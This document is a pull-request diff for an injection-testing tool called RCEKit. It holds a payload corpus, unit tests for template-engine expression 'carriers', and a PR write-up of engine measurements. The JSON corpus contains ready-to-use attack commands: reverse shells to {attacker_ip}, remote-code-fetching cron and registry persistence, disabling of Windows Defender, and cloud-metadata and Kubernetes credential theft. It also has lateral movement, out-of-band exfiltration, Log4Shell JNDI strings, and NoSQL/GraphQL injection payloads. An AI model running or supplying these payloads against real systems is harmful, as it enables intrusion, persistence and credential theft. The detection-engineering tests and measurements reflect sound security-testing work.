+        "mkdir -p ~/.config/systemd/user; echo -e '[Service]\nExecStart=/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"\n[Install]\nWantedBy=default.target' > ~/.config/systemd/user/update.service",
+        "echo '*/10 * * * * root /usr/bin/python3 -c \"import urllib.request; exec(urllib.request.urlopen(\\'http://{attacker_domain}/s.py\\').read())\"' >> /etc/cron.d/system"
+      ],
+      "windows": [
+        "reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v Updater /t REG_SZ /d C:\\\\Windows\\\\Temp\\\\backdoor.exe /f",
+        "schtasks /Create /SC ONLOGON /TN Updater /TR \\\"powershell.exe -ExecutionPolicy Bypass -File %TEMP%\\\\backdoor.ps1\\\" /F",
+        "powershell -Command \"New-ItemProperty -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name Sync -Value 'powershell -nop -w hidden -c Invoke-WebRequest http://{attacker_domain}/sync.ps1 -OutFile $env:TEMP\\\\sync.ps1; & $env:TEMP\\\\sync.ps1'\"",
+        "powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"",
+        "copy %SystemRoot%\\\\System32\\\\cmd.exe %APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\update.exe"
+      ]
+    },
+    "cloud_metadata": {
+      "unix": [
+        "curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
+        "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+        "wget -q -O- http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H 'Metadata:true'",
+        "aws sts get-caller-identity",
+        "curl http://100.100.100.200/latest/meta-data/ram/security-credentials/"
+      ],
+      "windows": [
+        "powershell -Command \"Invoke-WebRequest -Headers @{'Metadata-Flavor'='Google'} -Uri http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\"",
+        "powershell -Command \"Invoke-RestMethod -Headers @{Metadata='true'} -Uri http://169.254.169.254/metadata/instance?api-version=2021-02-01\"",
+        "powershell -Command \"Invoke-WebRequest -Uri http://169.254.169.254/latest/meta-data/iam/security-credentials/\"",
+        "powershell -Command \"Invoke-RestMethod -Uri http://100.100.100.200/latest/meta-data/ram/security-credentials/\""
+      ],
+      "docker": [
+        "curl --connect-timeout 1 http://169.254.169.254/latest/meta-data/",
+        "ip route",
+        "nsenter --target 1 --mount --uts --ipc --net --pid curl http://169.254.169.254/latest/meta-data/"
+      ],
+      "kubernetes": [
+        "kubectl get secrets -n kube-system aws-auth -o yaml",
+        "curl -k -H 'Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' https://kubernetes.default.svc/api",
+        "kubectl get configmap -n kube-system cluster-info -o yaml"
+      ]
+    },
+    "database_enumeration": {
+      "unix": [
+        "mysql -e \"SHOW DATABASES;\"",
+        "psql -c \"SELECT table_schema,table_name FROM information_schema.tables LIMIT 10;\"",
+        "mongo --quiet --eval \"db.adminCommand({listDatabases:1})\"",
+        "sqlite3 /etc/passwd \"SELECT * FROM sqlite_master;\"",
+        "redis-cli INFO"
+      ],
+      "windows": [
+        "sqlcmd -Q \"SELECT name FROM sys.databases\"",
+        "powershell -Command \"Invoke-Sqlcmd -Query \"\"SELECT name FROM master..sysdatabases\"\"\"",
+        "wmic path win32_service get Name,PathName | findstr /i sql"
+      ],
+      "php": [
+        "$pdo = new PDO('mysql:host=127.0.0.1', 'root', ''); foreach($pdo->query('SHOW DATABASES') as $row){echo $row[0] . \"\\n\";}",
+        "echo mysqli_get_host_info(mysqli_connect('127.0.0.1', 'root', ''));",
+        "$db = new PDO('sqlite:/var/www/html/database.sqlite'); foreach($db->query('SELECT name FROM sqlite_master') as $row){echo $row['name'];}"
+      ],
+      "python": [
+        "import sqlite3; [print(row) for row in sqlite3.connect('app.db').execute(\"SELECT name FROM sqlite_master WHERE type='table'\")]",
+        "import pymongo; client = pymongo.MongoClient('mongodb://127.0.0.1:27017'); print(client.list_database_names())",
+        "import mysql.connector; conn = mysql.connector.connect(user='root',password='',host='127.0.0.1'); cursor = conn.cursor(); cursor.execute('SHOW DATABASES'); print(cursor.fetchall())"
+      ]
+    },
+    "lateral_movement": {
+      "unix": [
+        "ssh -oStrictHostKeyChecking=no user@{attacker_ip}",
+        "for host in $(cut -d' ' -f1 /etc/hosts); do ssh -oBatchMode=yes $host uptime; done",
+        "scp /etc/passwd {attacker_ip}:/tmp/passwd_copy",
+        "ansible all -i {attacker_ip}, -m shell -a 'whoami'",
+        "rsh {attacker_ip} whoami"
+      ],
+      "windows": [
+        "wmic /node:{attacker_ip} process call create 'cmd.exe /c whoami'",
+        "psexec \\\\{attacker_ip} cmd.exe /c whoami",
+        "winrs -r:{attacker_ip} cmd",
+        "powershell -Command \"Invoke-Command -ComputerName {attacker_ip} -ScriptBlock { whoami }\"",
+        "net use \\\\{attacker_ip}\\\\C$"
+      ]
+    },
+    "waf_bypass": {
+      "unix": [
+        "cat${IFS}/etc/passwd",
+        "cat$IFS/etc/passwd",
+        "cat${IFS%??}/etc/passwd",
+        "{cat,/etc/passwd}",
+        "cat</etc/passwd",
+        "who$@ami",
+        "uname${IFS}-a",
+        "i\\d"
+      ],
+      "windows": [
+        "who^ami",
+        "wh^o^ami",
+        "type%09C:\\Windows\\win.ini",
+        "cmd /c who^ami"
+      ]
+    },
+    "oob": {
+      "unix": [
+        "curl http://{oob}/",
+        "wget -qO- http://{oob}/",
+        "nslookup {oob}",
+        "ping -c 1 {oob}",
+        "dig {oob}",
+        "curl http://{oob}/$(whoami)",
+        "curl http://$(whoami).{oob}/"
+      ],
+      "windows": [
+        "nslookup {oob}",
+        "powershell -c \"Invoke-WebRequest -UseBasicParsing http://{oob}/\"",
+        "powershell -c \"Resolve-DnsName {oob}\"",
+        "certutil -urlcache -f http://{oob}/ %TEMP%\\x",
+        "cmd /c nslookup %USERNAME%.{oob}"
+      ],
+      "java": [
+        "${jndi:ldap://{oob}/a}",
+        "${jndi:dns://{oob}/a}",
+        "${jndi:rmi://{oob}/a}"
+      ]
+    },
+    "nosql_injection": {
+      "mongodb": {
+        "operator_injection": [
+          "{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}}",
+          "{\"username\": {\"$gt\": \"\"}, \"password\": {\"$gt\": \"\"}}",
+          "{\"username\": \"admin\", \"password\": {\"$regex\": \"^.*\"}}",
+          "username[$ne]=admin&password[$ne]=x",
+          "{\"$or\": [{}, {\"x\": \"y\"}], \"username\": \"admin\"}"
+        ],
+        "where_js": [
+          "{\"$where\": \"return true\"}",
+          "{\"$where\": \"this.password == this.username\"}",
+          "{\"$where\": \"sleep(5000)\"}",
+          "admin' || '1'=='1",
+          "'; return true; var x='"
+        ],
+        "server_side_js": [
+          "{\"$expr\": {\"$function\": {\"body\": \"function(){return true}\", \"args\": [], \"lang\": \"js\"}}}",
+          "{\"$expr\": {\"$function\": {\"body\": \"function(){return sleep(5000)}\", \"args\": [], \"lang\": \"js\"}}}",
+          "{\"$accumulator\": {\"init\": \"function(){return sleep(5000)}\", \"accumulate\": \"function(){}\", \"accumulateArgs\": [], \"merge\": \"function(){}\", \"lang\": \"js\"}}"
+        ]
+      }
+    },
+    "graphql_injection": {
+      "graphql": {
+        "introspection": [
+          "{__schema{types{name}}}",
+          "{__schema{queryType{name} mutationType{name} types{name fields{name}}}}",
+          "{__type(name:\"User\"){name fields{name type{name kind}}}}",
+          "query{__typename}"
+        ],
+        "injection": [
+          "{ user(id: \"1; id\") { name } }",
+          "{ user(id: \"1' OR '1'='1-- \") { name } }",
+          "{ search(q: \"$(id)\") { id } }",
+          "{ file(path: \"../../../../etc/passwd\") { content } }",
+          "{ user(id: \"1${IFS}||${IFS}id\") { name } }"
+        ],
+        "batching": [
+          "{ a: user(id:\"1\"){name} b: user(id:\"2\"){name} c: user(id:\"3\"){name} }",
+          "query { a { b { c { d { e } } } } }"
+        ]
+      }
     }
+  },
+  "detection_payloads": {
+    "unix": [
+      "echo DETECTION_{canary}",
+      "sleep 5",
+      "printf 'canary:%s' $(hostname)",
+      "command -v whoami && echo HEALTH_{canary}",
+      "printf 'det:%s' $(id -u)",
+      "curl http://{oob}/",
+      "nslookup {oob}"
+    ],
+    "windows": [
+      "echo DETECTION_{canary}",
+      "timeout /T 5",
+      "powershell -Command \"Start-Sleep -Seconds 3; Write-Output 'DETECTION_{canary}'\"",
+      "for /f \"tokens=2 delims==\" %i in (\"%TIME%\") do @echo DETECTION_{canary}:%i",
+      "powershell -Command \"[Console]::WriteLine('det-{canary}')\"",
+      "nslookup {oob}"
+    ],
+    "php": [
+      "echo 'DETECTION_{canary}';",
+      "error_log('DETECTION_{canary}');",
+      "var_dump('DETECTION_{canary}');"
+    ],
+    "python": [
+      "print('DETECTION_{canary}')",
+      "import time; time.sleep(2)",
+      "import os; print(f'detect:{canary}:{os.getpid()}')",
+      "__import__('time').sleep(1)"
+    ],
+    "nodejs": [
+      "console.log('DETECTION_{canary}')",
+      "setTimeout(()=>console.log('timer {canary}'), 1000)",
+      "process.stdout.write('detect-{canary}')",
+      "setImmediate(()=>console.log('det:{canary}'))"
+    ],
+    "java": [
+      "System.out.println(\"DETECTION_{canary}\");",
+      "Thread.sleep(2000);",
+      "System.err.println(\"DETECTION_{canary}\");",
+      "System.out.printf(\"det:%s\\n\", \"{canary}\");"
+    ],
+    "dotnet": [
+      "Console.WriteLine(\"DETECTION_{canary}\");",
+      "System.Threading.Thread.Sleep(2000);",
+      "Console.Error.WriteLine(\"det-{canary}\");"
+    ],
+    "docker": [
+      "echo 'detector:{canary}'",
+      "sleep 2",
+      "cat /proc/1/cgroup | head -n 5"
+    ],
+    "kubernetes": [
+      "kubectl get pods --namespace default",
+      "echo 'kube-detect-{canary}'",
+      "kubectl cluster-info"
+    ],
+    "ruby": [
+      "puts 'DETECTION_{canary}'",
+      "sleep 1"
+    ],
+    "perl": [
+      "print \"DETECTION_{canary}\\n\";",
+      "select(undef, undef, undef, 1);"
+    ],
+    "go": [
+      "fmt.Println(\"DETECTION_{canary}\")",
+      "time.Sleep(1 * time.Second)"
+    ],
+    "sql": [
+      "SELECT 'DETECTION_{canary}';",
+      "SELECT pg_sleep(1);"
+    ],
+    "powershell": [
+      "Write-Output \"DETECTION_{canary}\"",
+      "Start-Sleep -Milliseconds 500"
+    ]
+  },
+  "eval_carriers": {
+    "freemarker": {
+      "engines": [
+        "freemarker"
+      ],
+      "template": "${(__EXPR__)?c}",
+      "notes": "Freemarker renders a bare ${a*b} with the locale's grouping separators (2,070,761,401), so the raw product RCEKit searches for is absent and a genuinely evaluating target reads as negative. ?c is the computer number format and yields the bare digits.",
+      "verified": "freemarker 2.3.32: ${a*b} -> '2,070,761,401' (product NOT found); ${(a*b)?c} -> '2070761401' (found)"
+    },
+    "velocity": {
+      "engines": [
+        "velocity"
+      ],
+      "template": "#set($rk=__EXPR__)$rk",
+      "notes": "In Velocity ${a*b} is a reference, not an expression, so it is not evaluated at all and passes through literally. Arithmetic needs a #set directive.",
+      "verified": "velocity-engine-core 2.3: ${a*b} -> literal '${a*b}'; #set($x=a*b)$x -> '2070761401'"
+    },
+    "thymeleaf": {
+      "engines": [
+        "thymeleaf"
+      ],
+      "template": "[[${__EXPR__}]]",
+      "notes": "Thymeleaf only evaluates an expression inside its inlining brackets; a bare ${a*b} in template text is emitted verbatim.",
+      "verified": "thymeleaf 3.1.2: ${a*b} -> literal '${a*b}'; [[${a*b}]] -> '2070761401'. The __${...}__ preprocessing form was also tried and did NOT evaluate standalone, so it is deliberately not shipped."
+    }
+  }
 }

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -3816,6 +3816,119 @@ class TimingScreenDepthTestCase(unittest.TestCase):
         self.assertEqual({p.separator for p in probes}, {"| "})
 
 
+class EvalCarrierTestCase(unittest.TestCase):
+    """Engine carriers for the `eval` probe.
+
+    A carrier exists for exactly one reason: an engine that evaluates the
+    expression perfectly but does not put the bare product in the response, so
+    RCEKit's oracle cannot see it and a vulnerable target reads as `negative`.
+    Three engines were measured to do that. Every other engine tested —
+    including OGNL with member access denied outright, SpEL's restricted
+    context, and Jinja2's SandboxedEnvironment — returns the bare product from
+    the bare probe, so a sandbox is not what carriers are for."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+        self.rec = make_record(environment="java", context="raw")
+
+    def _probes(self, config=None):
+        import random as _random
+        return EvalExpr(self.gen, config or {}).build_probes(self.rec, _random.Random(42))
+
+    def test_the_corpus_declares_the_carriers(self):
+        # Invariant: new payload material is declarative, so coverage can be
+        # extended without touching Python.
+        self.assertTrue(self.gen.eval_carriers)
+        for name, carrier in self.gen.eval_carriers.items():
+            self.assertIn("template", carrier, name)
+            self.assertIn(EvalExpr.CARRIER_TOKEN, carrier["template"], name)
+            self.assertTrue(carrier.get("notes"), f"{name} must say why it exists")
+            self.assertTrue(carrier.get("verified"),
+                            f"{name} must record what it was measured against")
+
+    def test_bare_forms_come_first(self):
+        # Fewest requests and the cleanest evidence line, and they already cover
+        # every engine that returns a bare product.
+        probes = self._probes()
+        carriers = [i for i, p in enumerate(probes) if p.carrier]
+        bare = [i for i, p in enumerate(probes) if not p.carrier]
+        self.assertTrue(bare and carriers)
+        self.assertLess(max(bare), min(carriers))
+
+    def test_carriers_do_not_change_the_oracle(self):
+        # The carrier varies the wrapper, never the proof: the expected value is
+        # still a product of random operands that the payload never spells out.
+        for probe in self._probes():
+            self.assertNotIn(probe.expected, probe.payload)
+            self.assertIn(probe.forbidden, probe.payload)
+
+    def test_every_probe_shares_one_expected_value(self):
+        self.assertEqual(len({p.expected for p in self._probes()}), 1)
+
+    def test_the_shipped_carriers_render_exactly_what_was_verified(self):
+        # Pinned deliberately. Each of these strings was run through the real
+        # engine and confirmed to yield the bare product where the bare ${a*b}
+        # does not; changing one silently would undo that without any test
+        # noticing.
+        rendered = {p.carrier: p.payload for p in self._probes() if p.carrier}
+        expr = next(p.forbidden for p in self._probes() if p.carrier)
+        self.assertEqual(rendered["freemarker"], f"${{({expr})?c}}")
+        self.assertEqual(rendered["velocity"], f"#set($rk={expr})$rk")
+        self.assertEqual(rendered["thymeleaf"], f"[[${{{expr}}}]]")
+
+    def test_eval_engines_narrows_the_carriers(self):
+        probes = self._probes({"eval_engines": ("velocity",)})
+        self.assertEqual({p.carrier for p in probes if p.carrier}, {"velocity"})
+        self.assertTrue([p for p in probes if not p.carrier], "bare forms always stay")
+
+    def test_an_unknown_engine_name_selects_no_carrier_but_keeps_the_bare_probes(self):
+        probes = self._probes({"eval_engines": ("nosuchengine",)})
+        self.assertEqual([p for p in probes if p.carrier], [])
+        self.assertEqual(len(probes), len(EvalExpr._FORMS))
+
+    def test_the_evidence_names_the_carrier(self):
+        # So a finding says which engine quirk it had to work around, rather
+        # than leaving the tester to rediscover it.
+        probe = next(p for p in self._probes() if p.carrier == "freemarker")
+        verdict = EvalExpr(self.gen).confirm(
+            Observation(200, f"out {probe.expected} end", control_body="idle"), probe)
+        self.assertEqual(verdict.status, "confirmed")
+        self.assertIn("freemarker carrier", verdict.evidence)
+
+    def test_a_bare_confirmation_evidence_is_unchanged(self):
+        probe = next(p for p in self._probes() if not p.carrier)
+        verdict = EvalExpr(self.gen).confirm(
+            Observation(200, f"out {probe.expected} end", control_body="idle"), probe)
+        self.assertEqual(verdict.status, "confirmed")
+        self.assertNotIn("carrier", verdict.evidence)
+
+    def test_a_digit_grouping_engine_confirms_only_through_its_carrier(self):
+        # Freemarker's actual behaviour, without needing Freemarker: it renders
+        # a bare ${a*b} with the locale's grouping separators, so the product
+        # RCEKit searches for is absent from a target that evaluated it
+        # perfectly. Measured: '${a*b}' -> '2,070,761,401'.
+        def route(method, path, params, headers, body):
+            value = params.get("t", "")
+            if value.startswith("${(") and value.endswith(")?c}"):
+                return 200, str(eval(value[3:-4]))          # ?c: bare digits
+            if value.startswith("${") and value.endswith("}"):
+                return 200, "{:,}".format(eval(value[2:-1]))  # grouped digits
+            return 200, value
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/?t=FUZZ", methods=["eval"])
+        confirmed = [r for r in results if r["verdict"] == "confirmed"]
+        self.assertTrue(confirmed, "the carrier must reach a digit-grouping engine")
+        self.assertTrue(all("freemarker carrier" in r["detail"] for r in confirmed))
+
+    def test_a_clean_target_stays_negative_with_carriers_enabled(self):
+        with local_target(lambda *a: (200, "<html>static 3979016000</html>")) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/?t=FUZZ", methods=["eval"])
+        self.assertFalse([r for r in results if r["verdict"] == "confirmed"])
+
+
 class SinkShapeLadderTestCase(unittest.TestCase):
     """The sink-shape ladder: the shapes an injected value can land in.
 


### PR DESCRIPTION
Phase 1 of the detection coverage plan — **re-scoped after measurement**, per your call to build only the measured gaps.

## What changed on contact with evidence

The plan's premise was that the bare `a*b` probe fails on modern expression-injection CVEs because those engines run inside a sandbox. That did not survive testing against the real engines.

A member-access sandbox restricts **method and field access**. Arithmetic and string concatenation need neither. With OGNL member access denied for *everything*:

```
deny-all  40277*51413                   -> 2070761401      <- evaluates
deny-all  'RKAAA'+(40277*51413)+'RKBBB' -> RKAAA2070761401RKBBB
deny-all  @java.lang.Math@max(1,2)      -> BLOCKED
deny-all  ''.getClass()                 -> BLOCKED
```

SpEL's restricted `SimpleEvaluationContext` and Jinja2's `SandboxedEnvironment` behave identically. **The bare probes already cover the sandboxed engines**, so no sandbox-escape carrier ships.

The widely-cited OGNL escape `(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)` additionally names a field that **no longer exists in OGNL 3.3.4** — `javap` confirms it is gone. On a current engine it is a probe that can only come back negative: the wasted-probe defect this project removed in 2.23.3.

## The gaps that are real

Three engines evaluate the expression perfectly and still made RCEKit report `negative`, because what came back was not the bare product the oracle searches for. Three different causes, one symptom.

RCEKit's **own generated probes**, run through the real engines:

```
freemarker  bare      ${2824*1409}               -> 3,979,016        CONFIRMS=no
velocity    bare      ${2824*1409}               -> ${2824*1409}     CONFIRMS=no
thymeleaf   bare      ${2824*1409}               -> ${2824*1409}     CONFIRMS=no
freemarker  carrier   ${(2824*1409)?c}           -> 3979016          CONFIRMS=YES
velocity    carrier   #set($rk=2824*1409)$rk     -> 3979016          CONFIRMS=YES
thymeleaf   carrier   [[${2824*1409}]]           -> 3979016          CONFIRMS=YES
```

- **Freemarker** groups digits by locale, so the product is present but not as the string being searched for.
- **Velocity**'s `${a*b}` is a *reference*, not an expression — never evaluated.
- **Thymeleaf** only evaluates inside its inlining brackets.

Measured against freemarker 2.3.32, velocity-engine-core 2.3, thymeleaf 3.1.2, OGNL 3.3.4, spring-expression 5.3.31, groovy 3.0.19, jinja2 3.1.6, plus ERB, Node and Python.

The plan's prescribed Thymeleaf carrier (`__${...}__`) was also tried and **did not evaluate**, so it is deliberately not shipped; `[[${...}]]` is what works. That is recorded in the corpus entry.

## Design

`eval_carriers` lives in `templates/payloads.json`, so a new carrier is a JSON entry rather than a code change. Each records `notes` (why it exists) and `verified` (what it was measured against) — a carrier without evidence that the bare probe fails is a probe that can only waste a request.

The carrier varies the wrapper and never the oracle: same random operands, same control differential, bare forms still first. `--eval-engines auto|NAMES` narrows them, though with three carriers there is little to save. The evidence line names the carrier:

```
target computed '3979016' via the freemarker carrier (random operands, absent from control)
```

## Phase 12 (fingerprinting) is not needed

Its justification in the plan was that the carrier layer multiplies probe count by the number of engines. It multiplies it by **3 extra probes per context** (7 bare → 10). There is no request-cost problem to solve, so I have not built a fingerprinting pre-flight. Say the word if you want it anyway.

## Tests

11 new tests: the corpus declares the carriers and each carries its evidence, bare forms come first, the carrier does not change the oracle, `--eval-engines` narrowing, an unknown engine name keeps the bare probes, the evidence names the carrier, and an end-to-end digit-grouping target that confirms only through its carrier. **The rendered carrier strings are pinned exactly as verified**, so changing one silently cannot undo the measurement.

```
python -m unittest discover -s tests
Ran 376 tests in 145.911s

OK
```

## Compatibility

Additive. Version 2.26.0 → 2.27.0 (MINOR), corpus re-embedded, README badge, CHANGELOG and `docs/reference.md` updated.